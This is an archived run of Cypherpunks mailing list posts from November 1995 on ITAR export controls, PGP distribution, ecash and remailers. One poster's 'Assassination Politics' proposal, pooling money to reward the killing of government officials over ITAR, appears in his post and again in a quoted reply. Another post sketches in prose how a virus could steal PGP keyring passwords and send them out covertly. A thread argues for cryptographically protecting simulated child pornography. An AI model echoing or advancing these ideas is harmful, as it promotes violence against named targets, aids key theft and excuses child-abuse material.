>with ITAR is that if you import that code, you can not then export the
>code since it is now covered by ITAR.

I didn't say that the code would ever be "re-exported": A copy would be brought into the US for domestic use, and everyone else outside the border would get their own copy from an outside server.

> secondly, it appears there is a move afoot to make it an ITAR
>violation to hire the foreign nationals to circumvent ITAR --basically,
>the Feds want to stop cryptography _everywhere_, including telling
>Russians they can not work for U.S. companies! Just where do they think
>they are getting off?
It is for this kind of problem that I "invented" my concept of "Assassination Politics": If everybody pissed off at this situation was willing to donate $10 to a fund to reward the deaths of a few government officials responsible for ITAR, I can well imagine that this would shake them up a bit.

From iagoldbe at calum.csclub.uwaterloo.ca Fri Nov 24 10:28:44 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 25 Nov 1995 02:28:44 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <604.9511240945@exe.dcs.exeter.ac.uk>
Message-ID: <4952bt$595@calum.csclub.uwaterloo.ca>

In article <604.9511240945 at exe.dcs.exeter.ac.uk>, wrote:
>Something that is puzzling me is how DigiCash is doing. Their
>software I think is ITAR regulated (or would be if it were shipped
>from a US ftp site). OK, so they get around it by shipping their
>software from Digicash, Bv, Netherlands.
>
>But, somewhere on their pages it mentions that: "Digicash, Bv is a
>wholly owned subsidiary of Digicash" (which *is* based in the US).
>
>Does that make them a counter example who is currently getting away
>with it? Just to complicate things further David Chaum is a US
>citizen, right? Maybe he himself is ok because he doesn't write the
>code himself, the digicash development team does. Is Digicash (US)
>hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
>in US legal terms?

Even if DigiCash gave a about ITAR and the NSA, ecash probably wouldn't be covered anyway, because the ITAR has a specific exception for encrypting financial data (that's so you can use your credit and bank cards overseas).

- Ian "What's with this day-after-thanksgiving, anyway...?"

From moroni at scranton.com Fri Nov 24 11:26:43 1995
From: moroni at scranton.com (Moroni)
Date: Sat, 25 Nov 1995 03:26:43 +0800
Subject: Virus attacks on PGP
In-Reply-To:
Message-ID:

Where can one get PGP burnt into cdrom?
Or the equipment to do it

Thanks in advance
moroni

From EALLENSMITH at ocelot.Rutgers.EDU Fri Nov 24 11:49:41 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Sat, 25 Nov 1995 03:49:41 +0800
Subject: crypto for porno users
Message-ID: <01HY0WLMKRLG8WYLO9@mbcl.rutgers.edu>

From: gjeffers at socketis.net (Gary Jeffers)

The SecureDrive 1.4 disk encryptor system solves their computer site disk storage problem. It also gives them the solution to the "rubber hose" problem. With a "damaged" key file and the use of a password, they have an effective defense against court orders demanding keys. (see the docs for SecureDrive 1.4). Also disk encryptors not only encrypt files but also solve the problem of temporary work files that are used by many software packages (They can be reconstructed).

-----------------------

Does anyone know of any strong encryptor systems that encrypt a MS-DOS directory with subdirectories, as opposed to a partition? Aside from convenience, this does have the potential advantage that if you did some FAT, etcetera manipulation, it wouldn't be possible to figure out what was garbage and what was encrypted without the program running properly (i.e., have an emergency hotkey combination that wiped the currently used password/phrase and removed the program and the alterations to the FAT). Also nice would be working off of a key on a 3.5" floppy, so it can be removed when not in use (thus reducing the need for typing in a password/phrase every few minutes). It should be compatible with Stacker and similar compression systems if possible, although it could also be run on the uncompressed drive- that way it'd take up more space, however.

-Allen

From Piete.Brooks at cl.cam.ac.uk Fri Nov 24 12:03:32 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Sat, 25 Nov 1995 04:03:32 +0800
Subject: Virus attacks on PGP
In-Reply-To:
Message-ID: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>

> Where can one get PGP burnt into cdrom?
Or the equipment to do it

If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD at the start of next year ...

From froomkin at law.miami.edu Fri Nov 24 12:36:09 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 25 Nov 1995 04:36:09 +0800
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To:
Message-ID:

On Fri, 24 Nov 1995, attila wrote:

[....]
> the test is going to be with someone like Sun who "bought" a group of
> Russian crypto programmers and left them in Russia. Now, the problem
> with ITAR is that if you import that code, you can not then export the
> code since it is now covered by ITAR.
[....]

I've heard this story several times from many different people. Anyone have any evidence that it's true? (My friends at Sun say they haven't heard the story, but don't work in the parts that would have necessarily heard it.)

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From master at internexus.net Fri Nov 24 12:39:43 1995
From: master at internexus.net (Laszlo Vecsey)
Date: Sat, 25 Nov 1995 04:39:43 +0800
Subject: Virus attacks on PGP
In-Reply-To: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
Message-ID:

> > Where can one get PGP burnt into cdrom? Or the equipment to do it
>
> If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> at the start of next year ...

Would PGP on CD-ROM truly guarantee a corrupt/virus free executable? A virus already running in memory could tamper with what it's doing, perhaps extracting the necessary keys and dumping them to a log file. This would be especially dangerous on a UNIX system where many people might be using PGP, thinking it is secure.
I think the only way to be safe is to actually boot up off of the CD-ROM, and hope that the hardware in your computer physically hasn't been tampered with :)

From ses at tipper.oit.unc.edu Fri Nov 24 13:47:24 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sat, 25 Nov 1995 05:47:24 +0800
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To:
Message-ID:

On Fri, 24 Nov 1995, Michael Froomkin wrote:

>
> I've heard this story several times from many different people. Anyone
> have any evidence that it's true? (My friends at Sun say they haven't
> heard the story, but don't work in the parts that would have necessarily
> heard it.)

It sounds like something I heard from John Gage, though the rumors may be getting conflated with Sun's purchase of the entire Soviet super-computer industry in (I think) '92.

From mch at squirrel.com Fri Nov 24 13:57:36 1995
From: mch at squirrel.com (Mark C. Henderson)
Date: Sat, 25 Nov 1995 05:57:36 +0800
Subject: PGP in Canada
In-Reply-To:
Message-ID: <9511241348.ZM19179@squirrel.com>

On Nov 23, 7:41, Tim Philp wrote:
> Subject: Re: PGP in Canada
> You can try to get PGP from the MIT site but it may not allow you to do
> so if it does not recognize your address as being Canadian.

You can also get pgp from a Canadian site. Get the file ftp://ftp.wimsey.com/pub/crypto/software/README for instructions and conditions (export restrictions).

--
Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer -- ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz

From zeus at pinsight.com Fri Nov 24 14:36:09 1995
From: zeus at pinsight.com (J. Kent Hastings)
Date: Sat, 25 Nov 1995 06:36:09 +0800
Subject: Fwd: Re: using ecash
Message-ID: <199511242334.PAA03668@chico.pinsight.com>

-- [ From: J.
Kent Hastings * EMC.Ver #2.5.02 ] --

------- FORWARD, Original message follows -------

Date: Friday, 24-Nov-95 03:38 PM
From: Mark Twain Ecash Support \ Internet: (mtwain at netcom.com)
To: J. Kent Hastings \ Internet: (zeus at pinsight.com)
Subject: Re: using ecash

> During the "play money" beta test, I saw "BEGIN E-CASH PAYMENT" messages
> that looked like a PGP format.
> I'd like to know if the Mark Twain "real money" US Dollar software has this
> feature, too.

Mark Twain Ecash does allow for ASCII email payments.

> The "heavy user" personal account has a 3 percent fee to withdraw, but
> verify that just to make sure.

With a Heavy User account you can move a hundred USD in or out of the Mint free of charge. For the second hundred USD the rate is 3%, but the money movement fee is counted against your monthly fee of $2, so you only pay 3$ - 2$ = 1$ for the second hundred.

-- Mark Twain Ecash Support

------- FORWARD, End of original message -------

From gjeffers at socketis.net Fri Nov 24 14:49:25 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Sat, 25 Nov 1995 06:49:25 +0800
Subject: establishing trust
Message-ID: <199511241600.KAA30794@mail.socketis.net>

RE: establishing trust

Question: What's a WEB OF TRUST with STATE agents in it?
Answer: - a DRIFTNET!

U heard it here first. :-)

THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American without it.
PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCCK! BBBEEEAAATTTT STATE!

Gary Jeffers

From dl at hplyot.obspm.fr Fri Nov 24 14:50:35 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 25 Nov 1995 06:50:35 +0800
Subject: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <9511241106.AA20922@hplyot.obspm.fr>

Mark M. writes:
> I just used the following simple shell script. Not very secure but does
> the trick for the purposes of export controlled directories.
> #!/bin/sh
> (date; uptime; ps -e; netstat; set) | md5sum

That one is quite good, you could also feed $1 which would be the previous "pass". Btw I'd suggest that you use netstat -n if you don't want it to take ages to resolve all the IP->name.

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
PLO [Hello to all my fans in domestic surveillance] Mossad FSF class struggle explosion hack

From zerucha at shell.portal.com Fri Nov 24 14:58:50 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Sat, 25 Nov 1995 06:58:50 +0800
Subject: Virus attacks on PGP
In-Reply-To:
Message-ID:

On Fri, 24 Nov 1995, Laszlo Vecsey wrote:

> > > Where can one get PGP burnt into cdrom? Or the equipment to do it
> >
> > If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> > at the start of next year ...
>
> Would PGP on CD-ROM truly guarantee a corrupt/virus free executable? A
> virus already running in memory could tamper with what it's doing,
> perhaps extracting the necessary keys and dumping them to a log file.
> This would be especially dangerous on a UNIX system where many people
> might be using PGP, thinking it is secure.
>
> I think the only way to be safe is to actually boot up off of the CD-ROM,
> and hope that the hardware in your computer physically hasn't been
> tampered with :)
>

My original post mentioned two things, the other was to cross-compile the sources. Maybe do it on 3 different systems (e.g. Sun, HP and DEC), and compare the binaries, then burn a CD. A virus would have to be very versatile to infect multiple platforms and insert code for another.

It would also be silly for a virus to just dump keys when PGP runs, it would be far easier to look for any occurrence of secring.pgp, and mail it, and/or monitor when it was opened and record keystrokes. And log files must go somewhere.
I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory cards that aren't in the system at the same time as a network or modem card. Moreover I can also simply use the DOS version (I use linux to communicate) - It would require quite an effort to create a virus that would work and pass data across the required OS problems and not break with the twice a week kernel-level changes :).

ViaCrypt also has a PCMCIA implementation of pgp, and it should be fairly easy to implement in an ASIC, or small embedded micro. That would be much harder to compromise. Of course anything so useful commercially would be the subject of our legal system.

It takes quite an effort to create a complex virus to do this. It reminds me of the Glomar Challenger that was used to recover the remains of a Russian sub (my memory is somewhat faulty). Such a virus would require a great investment in time and money. What target would be worth it? Many otherwise feasible things aren't economically practical.

zerucha at shell.portal.com -or- 2015509 on MCI Mail
finger zerucha at jobe.portal.com for PGP key

From scs at lokkur.dexter.mi.us Fri Nov 24 15:05:21 1995
From: scs at lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 25 Nov 1995 07:05:21 +0800
Subject: Sun speaks out - but not to the cypherpunks
In-Reply-To: <199511050203.SAA01370@jobe.shell.portal.com>
Message-ID: <495i89$1db@lokkur.dexter.mi.us>

anonymous-remailer at shell.portal.com writes:

>The CBC (Canadian Broadcasting Corporation) detailed a software
>code problem in one of AECL's (Atomic Energy of Canada Limited's)
>instruments which deliver penetrating radiation.

>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose
>100 times what was prescribed. This software "bug" literally killed
>wherever the machine was in use.

. . .
>Or alternatively, another lesson could be pulled out: To avoid this
>problem, ensure that your code is mathematically provable or utilize
>appropriate hardware overrides.

If this is the same case I read of two or three years back, it should be noted that not one but three safety interlocks had to fail simultaneously -- one human, one hardware, one software. The software glitch has gotten the biggest play in the press, but it was not the sole cause of the problem.

--
Yea, the heavens shall open and the NP-complete solution given forth. ATT executives shall give birth to two-headed operating systems, and copyrights shall be expunged. The voice of the GNU shall be heard, but the faithless will be without transceivers.

From x93ojg at juliet.stfx.ca Fri Nov 24 15:09:21 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Sat, 25 Nov 1995 07:09:21 +0800
Subject: (PGP in Canada) another new question.
In-Reply-To: <9511241348.ZM19179@squirrel.com>
Message-ID:

Is pgp able to be put on a university network and used by all the students? I am again referring to use in Canada.

--
T H E M A N , T H E M Y T H , T H E L E G E N D .
******************************************************************************
* Dylan "Still" Boudreau * Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca * Wisdom is humble that she knows no more. *
******************************************************************************
* Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html *
******************************************************************************
When someone says, "That's a good question." You can be sure it's a lot better than the answer you're going to get.
From moroni at scranton.com Fri Nov 24 16:04:37 1995
From: moroni at scranton.com (Moroni)
Date: Sat, 25 Nov 1995 08:04:37 +0800
Subject: crypto for porno users
In-Reply-To: <199511232149.PAA21305@khijol>
Message-ID:

I wish we could get off the subject of the kiddie porn, it makes me wonder what people on this list are doing when they are not mailing out letters. Not to flame, BUT it is such a serious issue and we all as adults and approaching adults should not treat it as an academic issue. It is the most victimizing of all crimes and I think I speak for some of us when I say that it would be better if we all found a way to get back to discussing the problems of cryptography as related to we not pornographers.

Thanks in Advance
moroni

From Matthew.Sheppard at Comp.VUW.AC.NZ Fri Nov 24 16:25:13 1995
From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard)
Date: Sat, 25 Nov 1995 08:25:13 +0800
Subject: "lack" of export control rules
In-Reply-To:
Message-ID: <199511250017.NAA16018@paramount.comp.vuw.ac.nz>

The shadowy figure took form and announced "I am attila and I say ...
> On Thu, 23 Nov 1995, sameer wrote:
> a> The feds have never established a general policy.
>
> in other words, business as usual with the Feds. If there is no "book"
> on what is or is not legal v/v ITAR, and the agency responsible will not
> communicate, it empirically says: "...well, be reasonable to meet the
> intent of the law, but we will not tell you what is really expected;
> however, if, in the future, we decide what we really want, we will bust
> you if you did not fully comply despite your good intentions --and, if
> that does not fly, we'll charge you with conspiracy...."

Just had an idea for Netscape's case. If we suppose that the ITAR governors ever managed to agree on a purely electronic based, export controlled distribution method then Netscape can write a Java applet or LiveScript to perform the task.
This would mean a *click here to download* interface and bypass the obfuscated process that dogs MIT pgp.

--
|~ |~ |~ o| o| ('< o| ,',) ''<< ---""---

From attila at primenet.com Fri Nov 24 17:31:24 1995
From: attila at primenet.com (attila)
Date: Sat, 25 Nov 1995 09:31:24 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To:
Message-ID:

On Fri, 24 Nov 1995, jim bell wrote:

>
> Attila at primenet.com said:
>
> > On Thu, 23 Nov 1995, jim bell wrote:
> >
> >> I very much agree with the direction you appear to be headed in. It seems
> >> to me that Netscape should have no problem devising some sort of scenario in
> >> which such a program eventually gets onto the nets, but in a way that is
> >> squeaky clean, at least for THEM.
> >>
> >>
> >> In addition, why should they even need to write the encryption part of their
> >> software IN the US? It occurs to me that one way to do this might be to
> >> send one of their programmers to a conveniently-located place, such as
> >> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> >> deal of fanfare, and tell him to "write some crypto." He does, and brings
> >> it back into the US with him, leaving a copy of it "outside" the country for
> >> international distribution.
> >>
> > I think they have that one covered --not only is it
> >violation of ITAR's intent to send a programmer out of the U.S.
>
> Well, don't assume that because something's a "violation of ITAR's INTENT"
> it is actually a violation of ITAR. It can't be assumed that ITAR is
> _perfect_: That it actually prohibits every activity the government that
> wrote it didn't like.
>

<#2 attila sez> the problem with the U.S. government is the U.S. conspiracy laws. If they have insufficient evidence to convict on "actual" violations, they use the concept that you were _part_ of a conspiracy to _circumvent_ the laws.

> , but is
> >illegal to hire a foreign national to program for your non-U.S. products.
>
> Sure about this?!?
>

<#2 attila> I don't have to push all my data into glimpse to find the article, but it's there. there are other sources, but not open to discussion; sorry.

> > the test is going to be with someone like Sun who "bought" a group of
> >Russian crypto programmers and left them in Russia. Now, the problem
> >with ITAR is that if you import that code, you can not then export the
> >code since it is now covered by ITAR.
>

<#2 attila> I guess I should have stated it better: what they are trying to do, for instance with Sun, is treat that foreign entity as if it was a direct operating unit of the parent U.S. company. OK, fine, you hire your Russian crypto programming team and my take from several conversations is that it is a _good_ team, but the U.S. wants to enforce the rule that the code produced in Russia for a "parent" American company is _a U.S. product_! --in other words, the foreign division can not sell it overseas. So far, no one has been charged, but my sources say Sun is the most likely. Either way you slice it, Sun is committed to world wide compatibility, and with that goes security, including worldwide NFS.

You figure it out... what is the alternative for Sun, or Netscape? yup, close down in the U.S. and go to Holland --oh, they can keep their sales offices in the U.S. --but they will be paying import duty, or they will end up contracting local assembly. closing down in the U.S. literally means off NASDAQ.

the fact that our government is effectively totalitarian is their paranoia -only paranoia that they might miss something or that they are not in total control stimulates the kind of attack on the Constitution that is going on.

> I didn't say that the code would ever be "re-exported": A copy would be
> brought into the US for domestic use, and everyone else outside the border
> would get their own copy from an outside server.
> > > > secondly, it appears there is a move afoot to make it an ITAR > >violation to hire the foreign nationals to circumvent ITAR --basically, > >the Feds want to stop cryptography _everywhere_, including telling > >Russians they can not work for U.S. companies! Just where do they think > >they are getting off? > > It is for this kind of problem that I "invented" my concept of > "Assassination Politics": If everybody pissed off at this situation was > willing to donate $10 to a fund to reward the deaths of a few government > officials responsible for ITAR, I can well imagine that this would shake > them up a bit. > Robert East said > What all these postings show is the desire of the federal government to > attempt to control crypto. In the past, they were, virtually, the only > source for encryption equipment and/or computer code. Well, now that > isn't true anymore. They came up with ITAR regulations to attempt to > put a lid on crypto and other technological developments but it is like > trying to use a sieve to carry water. There are many programmers and > others who will produce code and make sure that it is exported > anonymously just to prove that the government isn't "All Powerful." > <#2 attila> yes, that is true, but that is not the point --we have been doing that ever since I have been involved in crypto. 20 years ago when the heat was on me, somebody else dumped it whereever. even simple things get the Feds' dander up and they need an example; if I had not had a U.S. Senator (and I never even met the gentleman) in my corner, I would have gone down for the big one in '76. Look at the problem Phil Zimmerman is having --several hundred thousand dollars in legal fees so far --for what; the original algorithms were published in Scientific American in Oct 77 --and then there was _silence_. Just try and find a copy of that issue in a public library; most were pulled. 
I may have been really pissed off after a couple thugs in trench coats knocked on _my_ door early morning to read me my rights for "exporting technology to a foreign power," or being detained in a little white room for 36 hours at immigration after speaking at a conference in Sweden and another in Copenhagen that was highly critical of U.S. policy --and discussing advanced hardware techniques for emulating BCD machines in not BCD bit slices --just happened to match the old Burroughs 3500s which were in all the missle silos --now, whatever gave them that idea? :) Ask Phil Zimmerman if he would do it again-- I will, because I don't give a shit, am old enough that I can afford to have ethics, and I am a Jeffersonian democrat; jefferson must be spinning over the speed of light over what the _conservatives_ would do, let alone what the liberal Democrats will bleed and do, like Clinton, or Hillary and her lez buddy Thomases, who, unpaid, occupies an office in the front row (she was the one who was seen carrying Foster's files upstairs to Hillary). > At some point in time the feds are going to put their collective tails > between their legs and go slink away to some convenient hiding place. > I think it's a case of Pandora's box being opened with no way of > reclosing it. > <#2 attila> naw. they're too stupid and too paranoid to give up. the U.S. has not had a free election since Lincoln's first term and Stanton wrote the War Powers Act which, to this day, has not been repealed. Russia has more democracy than the U.S. --even if they are totally SNAFU. The U.S. hasn't degenerated to Hussein or the Ayatollah, but if NSA and Freeh have their way, it might. As Will Rogers said in the early 30s: "...go to the circus? why would I want to do that when Congress is in session?" or Mark Twain, who said something to the effect: "...the only natural criminal class in America is our Congress...." it's all a matter of control, or the appearance of being in control. 
No, they cant bust all of us, but they can set some pretty painful and expensive example of a few of us. ...been there, and done that! > Bob From s1113645 at tesla.cc.uottawa.ca Fri Nov 24 18:06:54 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 25 Nov 1995 10:06:54 +0800 Subject: [rehash] Re: crypto for porno users In-Reply-To: <199511241535.JAA30731@mail.socketis.net> Message-ID: Watch the cpunks go round and round and round and... On Fri, 24 Nov 1995, Gary Jeffers wrote: > I know little of the theory of Dining Cryptographers but I would think > that a good implementation of it would make infiltrators useless. I will > leave it for other Cypherpunks to discuss the mechanics (specific and > general) for actually doing this. Dining Cryptographers nets (aka DC-nets) are the whole idea behind the type 2 anon remailers like Mixmaster, and the remailernet in general. You'll find a lot on this in the archives, the ftp site (which has Chaum's DC article and a good explanation by Tim May) and a few peoples' pages. (I think they're mostly pointed to in the pages I list) You'll find Mixmaster at Wei Dai posted some articles a few months ago about traffic analysis of such remailers. He still has one of them at Sameer also has a two-way encrypted-command remailer. Check out for details. The archives are at (I realize this has been posted n zillion times) Wasn't there a DC-net mailing list once upon a time? (Tim mentions it in some of his writings) Did this wither away or merge into the remailer-ops list? From markm at omni.voicenet.com Fri Nov 24 19:42:46 1995 From: markm at omni.voicenet.com (Mark M.) Date: Sat, 25 Nov 1995 11:42:46 +0800 Subject: Virus attacks on PGP In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 24 Nov 1995, Moroni wrote: > > Where can one get PGP burnt into cdrom? 
> Or the equipment to do it
> Thanks in advance
> moroni
>
>
>

I remember seeing in a computer catalog a device that can burn data into a cdrom and it even supplies blank cd's. Unfortunately, I cannot remember the name of the catalog. It might have been _Tiger Software_ or some similar catalog. I do know that the technology is available.

`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47 20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/

From jirib at sweeney.cs.monash.edu.au Fri Nov 24 21:26:25 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 25 Nov 1995 13:26:25 +0800
Subject: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <199511250514.QAA13966@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello "E. ALLEN SMITH" and moroni at scranton.com and cypherpunks at toad.com

Allen wrote:

> From: IN%"moroni at scranton.com" "Moroni" 24-NOV-1995 14:52:11.13
>
> >I wish we could get off the subject of the kiddie porn, it makes
> >me wonder what people on this list are doing when they are not
...

I believe that the thread originally was on pornography in general, not any particular type...

One reason to talk of it might be that users of legitimate pornography (non-violent erotica, X, whatever you call it) are a likely adopter of privacy technology (encryption, e cash, anon, etc). They may also be a sufficiently numerous group to affect elections, should one or the other party actually be better than the other. Particularly in Australia, where I understand X-rated material may be sold only in the Territories, and anyone living in one of the States has to drive over or mail-order.

...
> governmental censorship. Consequently, I would like to give two
> counterarguments to the idea that child pornography is not
> something that should be cryptographically protected.
... [age of consent; generated without children] ...

One can even imagine situations with real live child pornography... Should one be forbidden from distributing pictures of oneself when one was younger?

However, I speak from assumptions and newspaper reports, not personal experience, so all of the above may be way off :-)

Adiau - Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

From norm at netcom.com Fri Nov 24 22:18:47 1995
From: norm at netcom.com (Norman Hardy)
Date: Sat, 25 Nov 1995 14:18:47 +0800
Subject: Virus attacks on PGP
Message-ID:

At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
....
>I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory
>cards that aren't in the system at the same time as a network or modem
>card. Moreover I can also simply use the DOS version (I use linux to
>communicate) - It would require quite an effort to create a virus that
>would work and pass data across the required OS problems and not break
>with the twice a week kernel-level changes :).
....

Yes it would be hard. When you choose your own protection as above an opponent would have to mount a significant effort just to get your stuff.

....
>It takes quite an effort to create a complex virus to do this. It
>reminds me of the Glomar Challenger that was used to recover the remains
>of a Russian sub (my memory is somewhat faulty). Such a virus would
>require a great investment in time and money. What target would be worth it?
>Many otherwise feasible things aren't economically practical.

Yes, but if your particular habits became widespread, an intelligence agency could amortize the virus effort across many victims. Here is just one such complicated virus: Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The patch writes to disk the location and password for the secure key ring. Concurrently the virus watches for there to be IP service and sends the disk information as a UDP. Alternatively the virus waits for idle time, (screen saver time) and dials an 800 number having turned off the modem speaker. But don't send the same data twice! There is a significant hazard for the virus producer here if someone finds the code and learns the 800 number. I am sure that the Telco would help locate the physical phone to which the 800 number led. UDP provides more ways to pigeon drop the secret so as to protect the reader of that data. Perhaps you can send the UDP to the NY-Times (or to your favorite enemy) over a line that you are tapping. The NYT will discard it and no one is the wiser. The virus is then anonymous.

From dlv at bwalk.dm.com Fri Nov 24 23:18:27 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 25 Nov 1995 15:18:27 +0800
Subject: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID:

"E. ALLEN SMITH" writes:

> The second is that given new image modification technologies,
> it is possible to produce what will seem child pornography, but
> with no actual harm done to children. In some ways, this product
> may reduce harm to children in some respects by providing a
> "competing product" to actual child pornography, and thus
> discourage its manufacture.
...

I recall that a man was recently convicted in Canada on child pornography charges (sorry, can't recall the exact statute name) for, basically, drawing naked kids on his computer. No children were harmed, or otherwise involved in producing the material, but the courts found it to be child pornography.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jirib at sweeney.cs.monash.edu.au Fri Nov 24 23:55:53 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 25 Nov 1995 15:55:53 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511250744.SAA14637@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Ian Goldberg and cypherpunks at toad.com

...
> Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
> I have a binary, which I can't even run...).
...

Sounds like good work!

...
> I guess the important bit is that the payee, the item being bought,
> and the cost are sent _in the clear_. Some of the people I've talked
> to think this is a huge privacy breach, and some don't. You all can
...

Yeah, it probably is. Then again you can probably use a dummy description, no? However, that doesn't get around the fact that anyone intercepting the packet who knows where it came from will immediately see straight through payer anonymity.

...
> - Ian "Why exactly isn't DigiCash releasing the protocol? What about
> the source?"
...

A Source Close To Digicash That Did Not Wish To Be Quoted once described them as 'crown jewels' (competitive advantage). ASCTDTDNWTBQ then appealed to Digicash's track record. I certainly hope that this genuinely is not Digicash's official opinion.

Thank you for once again showing the futility of security by obscurity.

Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

From weld at l0pht.com Sat Nov 25 04:31:37 1995
From: weld at l0pht.com (Weld Pond)
Date: Sat, 25 Nov 1995 20:31:37 +0800
Subject: CJR_war
Message-ID:

Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld
L 0 p h t H e a v y I n d u s t r i e s
Technical archives for the people - Bio/Electro/Crypto/Radio

From nobody at REPLAY.COM Sat Nov 25 07:15:25 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 25 Nov 1995 23:15:25 +0800
Subject: Gates: Jiffy Iffy Crypto
Message-ID: <199511251506.QAA03450@utopia.hacktic.nl>

From "The Road Ahead," by Bill Gates, with Nathan Myhrvold and Peter Rinearson, Viking, 1995.

[Paths to the Highway, pp. 106-111]

Governments have long understood the importance of keeping information private, for both economic and military reasons. The need to make personal, commercial, military, or diplomatic messages secure (or to break into them) has attracted powerful intellects through the generations. It is very satisfying to break an encoded message. Charles Babbage, who made dramatic advances in the art of code breaking in the mid-1800s, wrote: "Deciphering is, in my opinion, one of the most fascinating of arts, and I fear I have wasted upon it more time than it deserves." I discovered its fascination as a kid when, like kids everywhere, a bunch of us played with simple ciphers. We would encode messages by substituting one letter of the alphabet for another.
If a friend sent me a cipher that began "ULFW NZXX," it would be fairly easy to guess that this represented "DEAR BILL," and that U stood for D, and L for E, and so forth. With those seven letters it wasn't hard to unravel the rest of the cipher fairly quickly. Past wars have been won or lost because the most powerful governments on earth didn't have the cryptological power any interested junior high school student with a personal computer can harness today. Soon any child old enough to use a computer will be able to transmit encoded messages that no government on earth will find easy to decipher. This is one of the profound implications of the spread of fantastic computing power. When you send a message across the information highway it will be "signed" by your computer or other information appliance with a digital signature that only you are capable of applying, and it will be encrypted so that only the intended recipient will be able to decipher it. You'll send a message, which could be information of any kind, including voice, video, or digital money. The recipient will be able to be almost positive that the message is really from you, that it was sent at exactly the indicated time, that it has not been tampered with in the slightest, and that others cannot decipher it. The mechanism that will make this possible is based on mathematical principles, including what are called "one-way functions" and "public-key encryption." These are quite advanced concepts, so I'm only going to touch on them. Keep in mind that regardless of how complicated the system is technically, it will be extremely easy for you to use. You'll just tell your information appliance what you want it to do and it will seem to happen effortlessly. A one-way function is something that is much easier to do than undo. Breaking a pane of glass is a one-way function, but not one useful for encoding. 
